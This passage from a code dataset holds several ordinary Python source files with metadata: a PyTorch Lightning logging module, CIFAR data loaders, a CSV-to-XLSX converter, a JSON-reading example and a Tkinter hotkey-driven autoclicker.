{"api_name": "google.appengine.ext.blobstore.BlobKey", "line_number": 55, "usage_type": "name"}, {"api_name": "google.appengine.ext.blobstore.BlobInfo", "line_number": 56, "usage_type": "argument"}, {"api_name": "google.appengine.ext.blobstore.delete", "line_number": 73, "usage_type": "call"}, {"api_name": "google.appengine.api.images.get_serving_url", "line_number": 83, "usage_type": "call"}, {"api_name": "google.appengine.api.images.NotImageError", "line_number": 84, "usage_type": "name"}, {"api_name": "django.utils.encoding.force_unicode", "line_number": 91, "usage_type": "call"}, {"api_name": "google.appengine.ext.blobstore.BlobKey", "line_number": 97, "usage_type": "call"}, {"api_name": 
"google.appengine.ext.blobstore.BlobInfo.get", "line_number": 100, "usage_type": "call"}, {"api_name": "google.appengine.ext.blobstore.BlobInfo", "line_number": 100, "usage_type": "name"}, {"api_name": "django.core.files.base.File", "line_number": 102, "usage_type": "name"}, {"api_name": "google.appengine.ext.blobstore.BlobReader", "line_number": 121, "usage_type": "call"}, {"api_name": "django.core.files.uploadhandler.FileUploadHandler", "line_number": 124, "usage_type": "name"}, {"api_name": "sjfnw.grants.utils.FindBlobKey", "line_number": 135, "usage_type": "call"}, {"api_name": "google.appengine.ext.blobstore.BlobKey", "line_number": 138, "usage_type": "call"}, {"api_name": "django.core.files.uploadhandler.StopFutureHandlers", "line_number": 139, "usage_type": "call"}, {"api_name": "google.appengine.ext.blobstore.BlobInfo", "line_number": 157, "usage_type": "call"}, {"api_name": "django.core.files.uploadedfile.UploadedFile", "line_number": 160, "usage_type": "name"}, {"api_name": "google.appengine.ext.blobstore.BlobReader", "line_number": 168, "usage_type": "call"}]} +{"seq_id": "13589620663", "text": "from typing import Any, Dict, List, Optional, Tuple\n\nimport lightning.pytorch as pl\nimport torch\nimport wandb\nfrom lightning.fabric import Fabric\n\nimport tools\n\n\nclass BaseLitModule(pl.LightningModule):\n \"\"\"\n Lightning Base Module\n \"\"\"\n\n def __init__(\n self,\n conf: Dict[str, Optional[Any]],\n fabric: Fabric,\n logging_prefixes: Optional[List[str]] = None,\n ):\n \"\"\"\n Constructor.\n :param conf: Configuration dictionary.\n :param fabric: Fabric instance.\n :param logging_prefixes: Prefixes for logging.\n \"\"\"\n super().__init__()\n self.conf = conf\n self.fabric = fabric\n if logging_prefixes is None:\n logging_prefixes = [\"train\", \"val\"]\n self.logging_prefixes = logging_prefixes\n self.metrics, self.avg_meters = self.configure_meters()\n if conf['logging'].get('wandb', {}).get('active', False):\n self.configure_wandb_metrics()\n self.current_epoch_ = 0\n\n def log_step(self,\n processed_values: Optional[Dict[str, torch.Tensor]] = None,\n metric_pairs: Optional[List[Tuple[torch.Tensor, torch.Tensor]]] = None,\n prefix: Optional[str] = \"\",\n ):\n \"\"\"\n Log the values and the metrics.\n :param processed_values: Values that are already processed and can be logged directly with an average value\n meter. Must be dictionaries with \"meter_key\" and \"value\".\n :param metric_pairs: Pairs of values that are fed into a metric meter. 
Must be tuples of (v1, v2), typically,\n v1 is a prediction and v2 is a target.\n :param prefix: Optional prefix for the logging.\n \"\"\"\n if processed_values is not None:\n for k, v in processed_values.items():\n meter_name = f\"{prefix}/{k}\" if prefix != \"\" else f\"{k}\"\n if meter_name not in self.avg_meters:\n self.avg_meters[meter_name] = tools.AverageMeter()\n self.avg_meters[meter_name](v)\n\n if metric_pairs is not None:\n for v1, v2 in metric_pairs:\n for m_name, metric in self.metrics.items():\n if m_name.startswith(prefix) or (prefix == \"\" and not \"/\" in m_name):\n metric(v1, v2)\n\n def configure_meters(self) -> (Dict[str, tools.AverageMeter], Dict[str, tools.AverageMetricWrapper]):\n \"\"\"\n Configure (create instances) the metrics.\n :return: Dictionary of metric meters and dictionary of loss meters.\n \"\"\"\n metrics, avg_meters = {}, {}\n for prefix in self.logging_prefixes:\n metrics.update({f\"{prefix}/{k}\": v for k, v in tools.metrics_from_conf(self.conf, self.fabric).items()})\n\n return metrics, avg_meters\n\n def configure_wandb_metrics(self):\n \"\"\"\n Configure the metrics for wandb.\n \"\"\"\n for prefix in self.logging_prefixes:\n wandb.define_metric(f'{prefix}/loss', summary='min')\n for m_name in self.metrics.keys():\n wandb.define_metric(f'{prefix}/{m_name}', summary='max')\n\n def log_(self) -> Dict[str, float]:\n \"\"\"\n Log the metrics.\n :return: Dictionary of logs.\n \"\"\"\n logs = {'epoch': self.current_epoch_}\n for m_name, m in self.avg_meters.items():\n val = m.mean\n if isinstance(val, torch.Tensor):\n val = val.item()\n logs[m_name] = val\n m.reset()\n for m_name, m in self.metrics.items():\n val = m.mean\n if isinstance(val, torch.Tensor):\n val = val.item()\n logs[m_name] = val\n m.reset()\n self.log_dict(logs)\n return logs\n\n def on_epoch_end(self) -> Dict[str, float]:\n \"\"\"\n Callback at the end of an epoch (log data).\n :return: Dictionary of logs.\n \"\"\"\n logs = self.log_()\n self.current_epoch_ += 1\n return logs\n", "repo_name": "sagerpascal/lateral-connections", "sub_path": "src/models/lightning_modules/lightning_base.py", "file_name": "lightning_base.py", "file_ext": "py", "file_size_in_byte": 4052, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "lightning.pytorch.LightningModule", "line_number": 11, "usage_type": "attribute"}, {"api_name": "lightning.pytorch", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 18, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 18, "usage_type": "name"}, {"api_name": "lightning.fabric.Fabric", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 40, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 40, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 41, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 41, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 41, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 42, "usage_type": "name"}, {"api_name": 
"tools.AverageMeter", "line_number": 56, "usage_type": "call"}, {"api_name": "tools.metrics_from_conf", "line_number": 72, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 65, "usage_type": "name"}, {"api_name": "tools.AverageMeter", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tools.AverageMetricWrapper", "line_number": 65, "usage_type": "attribute"}, {"api_name": "wandb.define_metric", "line_number": 81, "usage_type": "call"}, {"api_name": "wandb.define_metric", "line_number": 83, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 93, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 99, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 85, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 106, "usage_type": "name"}]} +{"seq_id": "43392803222", "text": "#!/usr/bin/env python3\n\n# reading json data using json module\n\nimport json\nreq_file=\"/home/inderpal2406/tmp/file_1.json\"\nfo=open(req_file,\"r\")\n#print(fo.read())\t# read json data as string, but at a time we can read data only once, if I perform json.load() after this, error\nprint(json.load(fo))\n#print(json.load(fo).get(\"glossary\"))\t# performing dictionary operation, this throws error if above statement is not commented\nfo.close()\n", "repo_name": "inderpal2406/python", "sub_path": "udemy/01_walkthrough/working_with_json_files_2.py", "file_name": "working_with_json_files_2.py", "file_ext": "py", "file_size_in_byte": 433, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.load", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "27801813328", "text": "import logging\n\nimport torch\n\nfrom torchvision import transforms, datasets\nfrom torch.utils.data import DataLoader, RandomSampler, DistributedSampler, SequentialSampler\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_loader(local_rank, hp):\n # if local_rank not in [-1, 0]:\n # torch.distributed.barrier()\n\n transform_train = transforms.Compose([\n transforms.RandomResizedCrop((hp.data.image_size, hp.data.image_size), scale=(0.05, 1.0)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),\n ])\n transform_test = transforms.Compose([\n transforms.Resize((hp.data.image_size, hp.data.image_size)),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),\n ])\n\n if hp.data.dataset == \"cifar10\":\n trainset = datasets.CIFAR10(root=hp.data.path,\n train=True,\n download=True,\n transform=transform_train)\n testset = datasets.CIFAR10(root=hp.data.path,\n train=False,\n download=True,\n transform=transform_test) if local_rank in [-1, 0] else None\n\n else:\n trainset = datasets.CIFAR100(root=hp.data.path,\n train=True,\n download=True,\n transform=transform_train)\n testset = datasets.CIFAR100(root=hp.data.path,\n train=False,\n download=True,\n transform=transform_test) if local_rank in [-1, 0] else None\n # if local_rank == 0:\n # torch.distributed.barrier()\n\n train_sampler = RandomSampler(trainset) if local_rank == 0 else DistributedSampler(trainset)\n test_sampler = SequentialSampler(testset)\n train_loader = DataLoader(trainset,\n sampler=train_sampler,\n batch_size=hp.train.batch,\n num_workers=4,\n pin_memory=True)\n test_loader = DataLoader(testset,\n sampler=test_sampler,\n batch_size=hp.train.valid_batch,\n num_workers=4,\n pin_memory=True) if testset is not None else None\n\n return 
train_loader, test_loader", "repo_name": "rishikksh20/CeiT-pytorch", "sub_path": "data_utils.py", "file_name": "data_utils.py", "file_ext": "py", "file_size_in_byte": 2540, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 88, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 16, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 16, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 17, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 18, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 18, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 19, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 19, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 21, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 21, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 22, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 22, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 24, "usage_type": "name"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 28, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 28, "usage_type": "name"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 32, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 32, "usage_type": "name"}, {"api_name": "torchvision.datasets.CIFAR100", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.datasets.CIFAR100", "line_number": 42, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 42, "usage_type": "name"}, {"api_name": "torch.utils.data.RandomSampler", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.utils.data.DistributedSampler", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.utils.data.SequentialSampler", "line_number": 50, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 56, "usage_type": "call"}]} +{"seq_id": "34688864372", "text": "import argparse\nimport csv\nimport datetime\nimport sys\n\ntry:\n from cStringIO import StringIO\nexcept ImportError:\n from StringIO import StringIO\n\nfrom openpyxl import Workbook\nfrom openpyxl.cell.cell import column_index_from_string\nfrom openpyxl.styles import Style, Font, numbers\nfrom openpyxl.writer.dump_worksheet import DumpWorksheet\nfrom openpyxl.xml.functions import XMLGenerator, start_tag, end_tag, tag\n\n\nclass CSV2XLSX(object):\n \"\"\"\n Converts CSV from stdin into XLSX to stdout. 
Also optionally converts columns to integers\n or datetimes and adjusts column widths.\n \"\"\"\n def __init__(self):\n self.args = self.parse_args()\n\n self.integer_cols = [column_index_from_string(c)-1 for c in self.args.integer_cols.split(',')]\\\n if self.args.integer_cols else []\n\n def datetime_spec_parse(arg_tuple):\n str_col, in_format, out_format = arg_tuple.split(';', 2)\n out_cell = {'style': Style(number_format=numbers.NumberFormat(format_code=out_format))}\n return column_index_from_string(str_col)-1, (in_format, out_cell)\n\n self.datetime_spec_dict = dict(datetime_spec_parse(a) for a in self.args.datetime_spec or ())\n\n self.HEADER_STYLE = Style(font=Font(bold=True))\n self.strptime = datetime.datetime.strptime\n\n def convert(self, infile, outfile):\n WidthsDumpWorksheet.col_widths = {}\n\n for width_spec in self.args.col_width or ():\n col, width = width_spec.split(',', 1)\n if '-' in col:\n col_lo, col_hi = map(column_index_from_string, col.split('-', 1))\n else:\n col_lo = col_hi = column_index_from_string(col)\n\n WidthsDumpWorksheet.col_widths[(col_lo, col_hi)] = width\n\n # TODO: This will be used when we switch to openpyxl 2.1.\n #Workbook._optimized_worksheet_class = WidthsDumpWorksheet\n\n wb = Workbook(optimized_write=True, optimized_worksheet_class=WidthsDumpWorksheet)\n\n ws = wb.create_sheet(title=self.args.sheet_name)\n\n for row in self.iter_rows(self.get_reader(infile)):\n ws.append(row)\n\n wb.save(outfile)\n\n # Clean up the mess.\n WidthsDumpWorksheet.col_widths = {}\n\n def get_reader(self, infile):\n return csv.reader(infile, delimiter=self.args.delimiter, quotechar=self.args.quotechar)\n\n def iter_rows(self, reader):\n for unused in range(self.args.header_rows):\n yield [{'value': cell.decode(self.args.input_encoding), 'style': self.HEADER_STYLE}\n for cell in reader.next()]\n\n for row in reader:\n row = [cell.decode(self.args.input_encoding) for cell in row]\n\n for col in self.integer_cols:\n if row[col]:\n row[col] = int(row[col])\n\n for col, (input_format, out_cell) in self.datetime_spec_dict.items():\n if row[col]:\n out_cell['value'] = self.strptime(row[col], input_format)\n row[col] = out_cell\n\n yield row\n\n def parse_args(self):\n p = argparse.ArgumentParser(description=self.__doc__)\n p.add_argument(\"input_encoding\", help=\"The character encoding of the input CSV.\")\n p.add_argument(\"sheet_name\", help=\"The name to put on the single sheet.\")\n\n p.add_argument(\"--delimiter\", \"-d\", default=';',\n help=\"Cell delimiter in the input. Default: semicolon (;)\")\n p.add_argument(\"--quotechar\", \"-q\", default='\"',\n help=\"Quoting character in the input. Default: double quote (\\\")\")\n p.add_argument(\"--header-rows\", \"-H\", type=int, default=0, metavar=\"NUMBER\",\n help=\"The number of leading rows to just pass with bold style \"\n \"without any type conversions. Default: 0\")\n\n p.add_argument(\"--integer-cols\", \"-i\", metavar='COLUMNS',\n help=\"Comma-delimited list of columns whose values should be converted \"\n \"to integer. Example: -iA,G,AA\")\n p.add_argument(\"--datetime-spec\", \"-t\", action='append', metavar=\"COLUMN;I-FORMAT;O-FORMAT\",\n help=\"Points to one of the columns that should be treated as date, time \"\n \"or datetime value. Semicolon-delimited tuple of column, \"\n \"input datetime format and output custom datetime format. 
\"\n \"Example: -t\\\"C;%%d.%%m.%%Y %%H:%%M;dd.mm.yyyy hh:mm\\\"\")\n\n p.add_argument(\"--col-width\", \"-w\", action='append', metavar=\"COLUMN,WIDTH\",\n help=\"Specifies the width for given column or column range. \"\n \"Example: -wA,20 -wO-R,30\")\n return p.parse_args()\n\n\n# TODO: This will be used when we switch to openpyxl 2.1.\n# class WidthsDumpWorksheet(DumpWorksheet):\n# \"\"\"\n# This is a hack to get the ... element to optimized writer by force.\n# \"\"\"\n# def write_header(self):\n# doc = super(WidthsDumpWorksheet, self).write_header()\n#\n# start_tag(doc, 'cols')\n# for (col_lo, col_hi), width in self.col_widths.items():\n# tag(doc, 'col', dict(min=str(col_lo), max=str(col_hi), width=width, customWidth=\"1\"))\n# end_tag(doc, 'cols')\n#\n# return doc\n\n\nclass WidthsDumpWorksheet(DumpWorksheet):\n \"\"\"\n This is a hack to get the ... element to optimized writer by force.\n \"\"\"\n def write_header(self):\n\n fobj = self.get_temporary_file(filename=self._fileobj_header_name)\n doc = XMLGenerator(fobj)\n\n start_tag(doc, 'worksheet',\n {\n 'xmlns': 'http://schemas.openxmlformats.org/spreadsheetml/2006/main',\n 'xmlns:r': 'http://schemas.openxmlformats.org/officeDocument/2006/relationships'})\n start_tag(doc, 'sheetPr')\n tag(doc, 'outlinePr',\n {'summaryBelow': '1',\n 'summaryRight': '1'})\n end_tag(doc, 'sheetPr')\n tag(doc, 'dimension', {'ref': 'A1:%s' % (self.get_dimensions())})\n start_tag(doc, 'sheetViews')\n start_tag(doc, 'sheetView', {'workbookViewId': '0'})\n tag(doc, 'selection', {'activeCell': 'A1',\n 'sqref': 'A1'})\n end_tag(doc, 'sheetView')\n end_tag(doc, 'sheetViews')\n tag(doc, 'sheetFormatPr', {'defaultRowHeight': '15'})\n\n # START csv2xlsx\n start_tag(doc, 'cols')\n for (col_lo, col_hi), width in self.col_widths.items():\n tag(doc, 'col', dict(min=str(col_lo), max=str(col_hi), width=width, customWidth=\"1\"))\n end_tag(doc, 'cols')\n # END csv2xlsx\n\n start_tag(doc, 'sheetData')\n\n\ndef main():\n output = StringIO()\n\n CSV2XLSX().convert(sys.stdin, output)\n\n sys.stdout.write(output.getvalue())\n", "repo_name": "impercz/csv2xlsx", "sub_path": "csv2xlsx.py", "file_name": "csv2xlsx.py", "file_ext": "py", "file_size_in_byte": 6883, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "61", "api": [{"api_name": "openpyxl.cell.cell.column_index_from_string", "line_number": 26, "usage_type": "call"}, {"api_name": "openpyxl.styles.Style", "line_number": 31, "usage_type": "call"}, {"api_name": "openpyxl.styles.numbers.NumberFormat", "line_number": 31, "usage_type": "call"}, {"api_name": "openpyxl.styles.numbers", "line_number": 31, "usage_type": "name"}, {"api_name": "openpyxl.cell.cell.column_index_from_string", "line_number": 32, "usage_type": "call"}, {"api_name": "openpyxl.styles.Style", "line_number": 36, "usage_type": "call"}, {"api_name": "openpyxl.styles.Font", "line_number": 36, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "attribute"}, {"api_name": "openpyxl.cell.cell.column_index_from_string", "line_number": 45, "usage_type": "argument"}, {"api_name": "openpyxl.cell.cell.column_index_from_string", "line_number": 47, "usage_type": "call"}, {"api_name": "openpyxl.Workbook", "line_number": 54, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 67, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 89, "usage_type": "call"}, {"api_name": "openpyxl.writer.dump_worksheet.DumpWorksheet", "line_number": 132, 
"usage_type": "name"}, {"api_name": "openpyxl.xml.functions.XMLGenerator", "line_number": 139, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 141, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 145, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.tag", "line_number": 146, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.end_tag", "line_number": 149, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.tag", "line_number": 150, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 151, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 152, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.tag", "line_number": 153, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.end_tag", "line_number": 155, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.end_tag", "line_number": 156, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.tag", "line_number": 157, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 160, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.tag", "line_number": 162, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.end_tag", "line_number": 163, "usage_type": "call"}, {"api_name": "openpyxl.xml.functions.start_tag", "line_number": 166, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 170, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 172, "usage_type": "attribute"}, {"api_name": "sys.stdout.write", "line_number": 174, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 174, "usage_type": "attribute"}]} +{"seq_id": "99539726", "text": "import tkinter as tk\nimport tkinter.ttk as ttk\nfrom pynput import keyboard\nfrom pynput.mouse import Button, Controller\nfrom pynput.keyboard import KeyCode\n\n\nclass AutoClicker:\n\n mouse_button_list = {\n 0: Button.left,\n 1: Button.middle,\n 2: Button.right\n }\n\n key_list = {\n 0: keyboard.KeyCode(char='f'),\n 1: keyboard.Key.f2,\n 2: keyboard.Key.f3,\n 3: keyboard.Key.f4,\n 4: keyboard.Key.f5,\n 5: keyboard.Key.f6,\n 6: keyboard.Key.f7,\n 7: keyboard.Key.f8,\n 8: keyboard.Key.f9,\n 9: keyboard.Key.f10,\n 10: keyboard.Key.f11,\n 11: keyboard.KeyCode(char='f')\n }\n\n # Default values\n break_loop = True\n time_interval = 1.0\n user_defined_mouse_button = Button.left\n user_defined_start = keyboard.Key.f1\n user_defined_stop = keyboard.Key.f2\n start_stop_key = KeyCode(char='f')\n user_defined_end = keyboard.Key.f3\n\n def __init__(self, master):\n self.master = master\n master.title(\"Autoclicker\")\n\n # Width x Height\n master.geometry(\"300x350\")\n\n self.time_frame = tk.Frame(master)\n self.time_frame.pack()\n\n self.shortcut_frame = tk.Frame(master)\n self.shortcut_frame.pack()\n\n self.top_frame = tk.Frame(master)\n self.top_frame.pack()\n\n self.mouse_button_frame = tk.Frame(master)\n self.mouse_button_frame.pack()\n\n self.middle_frame = tk.Frame(master)\n self.middle_frame.pack()\n\n self.bottom_frame = tk.Frame(master)\n self.bottom_frame.pack()\n\n self.label_time = ttk.Label(\n self.time_frame, text=\"Time between clicks (seconds)\")\n self.label_time.grid(column=1, row=0)\n\n self.label_shortcut = ttk.Label(\n self.shortcut_frame, text=\"Start shortcut key\")\n self.label_shortcut.grid(column=1, row=0)\n\n self.label_mouse_button = ttk.Label(\n self.mouse_button_frame, text=\"Mouse button to click\")\n 
self.label_mouse_button.grid(column=1, row=0)\n\n self.label_start = ttk.Label(self.top_frame, text=\"Key press to activate clicking\")\n self.label_start.grid(column=1, row=0)\n\n self.label_stop = ttk.Label(self.middle_frame, text=\"Stop shortcut key\")\n self.label_stop.grid(column=1, row=0)\n\n self.label_end = ttk.Label(self.bottom_frame, text=\"End shortcut key\")\n self.label_end.grid(column=1, row=0)\n\n self.time_string = tk.StringVar()\n self.time_string.set(\"0.15\")\n tk.Entry(self.time_frame, textvariable=self.time_string,\n width=8).grid(column=1, row=1)\n\n self.shortcut_string = tk.StringVar()\n self.shortcut_string.set(\"f\")\n tk.Entry(self.shortcut_frame, textvariable=self.shortcut_string,\n width=8).grid(column=1, row=1)\n\n self.mouse_button_index = ttk.Combobox(\n self.mouse_button_frame, width=15, textvariable=tk.StringVar(), state=\"readonly\")\n self.mouse_button_index['values'] = (\n Button.left, Button.middle, Button.right)\n self.mouse_button_index.grid(column=1, row=1)\n self.mouse_button_index.current(0)\n\n self.key_start_index = ttk.Combobox(\n self.top_frame, width=15, textvariable=tk.StringVar(), state=\"readonly\")\n self.key_start_index['values'] = (keyboard.Key.f1, keyboard.Key.f2, keyboard.Key.f3, keyboard.Key.f4, keyboard.Key.f5,\n keyboard.Key.f6, keyboard.Key.f7, keyboard.Key.f8, keyboard.Key.f9, keyboard.Key.f10, keyboard.Key.f11, keyboard.Key.f12)\n self.key_start_index.grid(column=1, row=1)\n self.key_start_index.current(0)\n\n self.key_stop_index = ttk.Combobox(\n self.middle_frame, width=15, textvariable=tk.StringVar(), state=\"readonly\")\n self.key_stop_index['values'] = (keyboard.Key.f1, keyboard.Key.f2, keyboard.Key.f3, keyboard.Key.f4, keyboard.Key.f5,\n keyboard.Key.f6, keyboard.Key.f7, keyboard.Key.f8, keyboard.Key.f9, keyboard.Key.f10, keyboard.Key.f11, keyboard.Key.f12)\n self.key_stop_index.grid(column=1, row=1)\n self.key_stop_index.current(1)\n\n self.key_end_index = ttk.Combobox(\n self.bottom_frame, width=15, textvariable=tk.StringVar(), state=\"readonly\")\n self.key_end_index['values'] = (keyboard.Key.f1, keyboard.Key.f2, keyboard.Key.f3, keyboard.Key.f4, keyboard.Key.f5,\n keyboard.Key.f6, keyboard.Key.f7, keyboard.Key.f8, keyboard.Key.f9, keyboard.Key.f10, keyboard.Key.f11, keyboard.Key.f12)\n self.key_end_index.grid(column=1, row=1)\n self.key_end_index.current(2)\n\n # ttk.Button(self.time_frame, text=\"Apply\",\n # command=self.set_time).grid(column=2, row=1)\n # ttk.Button(self.mouse_button_frame, text=\"Apply\",\n # command=self.set_mouse_button).grid(column=2, row=1)\n # ttk.Button(self.top_frame, text=\"Apply\",\n # command=self.key_list_start).grid(column=2, row=1)\n # ttk.Button(self.middle_frame, text=\"Apply\",\n # command=self.key_list_stop).grid(column=2, row=1)\n # ttk.Button(self.bottom_frame, text=\"Apply\",\n # command=self.key_list_end).grid(column=2, row=1)\n\n # TODO: Change key_list_end to apply function that sets all fields\n ttk.Button(self.bottom_frame, text=\"Apply\",\n command=self.key_list_end).grid(column=1, row=2)\n\n self.mouse = Controller()\n\n self.key_listener = keyboard.Listener(on_press=self.on_press)\n self.key_listener.start()\n\n def click_loop(self):\n if self.break_loop == False:\n self.mouse.press(self.user_defined_mouse_button)\n self.mouse.release(self.user_defined_mouse_button)\n self.master.after(int(self.time_interval * 1000), self.click_loop)\n\n def on_press(self, key):\n if key == self.user_defined_start and self.break_loop:\n self.break_loop = False\n self.click_loop()\n if 
key == self.user_defined_stop and self.break_loop == False:\n self.break_loop = True\n if key == self.user_defined_end:\n self.master.destroy()\n\n def set_time(self):\n try:\n if float(self.time_string.get()) <= 0:\n return\n self.time_interval = float(self.time_string.get())\n except:\n return\n self.label_time.config(text=\"Time interval : \" +\n self.time_string.get() + \"(s)\")\n\n def set_mouse_button(self):\n self.user_defined_mouse_button = self.mouse_button_list.get(\n self.mouse_button_index.current(), None)\n self.label_mouse_button.config(\n text=\"Mouse button : \" + str(self.user_defined_mouse_button).replace('Button.', '').title())\n\n def key_list_start(self):\n temp_key = self.user_defined_start\n self.label_start.config(text=\"Start key : F\" +\n str(self.key_start_index.current() + 1))\n self.user_defined_start = self.key_list.get(\n self.key_start_index.current(), None)\n if self.user_defined_start == self.user_defined_stop or self.user_defined_start == self.user_defined_end:\n if self.user_defined_start == self.user_defined_stop:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_stop.config(text=\"Stop key : F\" + num)\n self.key_stop_index.current(int(num) - 1)\n self.user_defined_stop = temp_key\n else:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_end.config(text=\"End key : F\" + num)\n self.key_end_index.current(int(num) - 1)\n self.user_defined_end = temp_key\n\n def key_list_stop(self):\n temp_key = self.user_defined_stop\n self.label_stop.config(text=\"Stop key : F\" +\n str(self.key_stop_index.current() + 1))\n self.user_defined_stop = self.key_list.get(\n self.key_stop_index.current(), None)\n if self.user_defined_stop == self.user_defined_start or self.user_defined_stop == self.user_defined_end:\n if self.user_defined_stop == self.user_defined_start:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_start.config(text=\"Start key : F\" + num)\n self.key_start_index.current(int(num) - 1)\n self.user_defined_start = temp_key\n else:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_end.config(text=\"End key : F\" + num)\n self.key_end_index.current(int(num) - 1)\n self.user_defined_end = temp_key\n\n def key_list_end(self):\n temp_key = self.user_defined_end\n self.label_end.config(text=\"End key : F\" +\n str(self.key_end_index.current() + 1))\n self.user_defined_end = self.key_list.get(\n self.key_end_index.current(), None)\n if self.user_defined_end == self.user_defined_start or self.user_defined_end == self.user_defined_stop:\n if self.user_defined_end == self.user_defined_start:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_start.config(text=\"Start key : F\" + num)\n self.key_start_index.current(int(num) - 1)\n self.user_defined_start = temp_key\n else:\n num = ''.join([x for x in str(temp_key) if x.isdigit()])\n self.label_stop.config(text=\"Stop key : F\" + num)\n self.key_stop_index.current(int(num) - 1)\n self.user_defined_stop = temp_key\n\n\nif __name__ == '__main__':\n root = tk.Tk()\n AutoClicker(root)\n root.mainloop()\n", "repo_name": "virejdasani/FunctionalAutoclicker", "sub_path": "app/autoclicker.py", "file_name": "autoclicker.py", "file_ext": "py", "file_size_in_byte": 9957, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pynput.mouse.Button.left", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pynput.mouse.Button", 
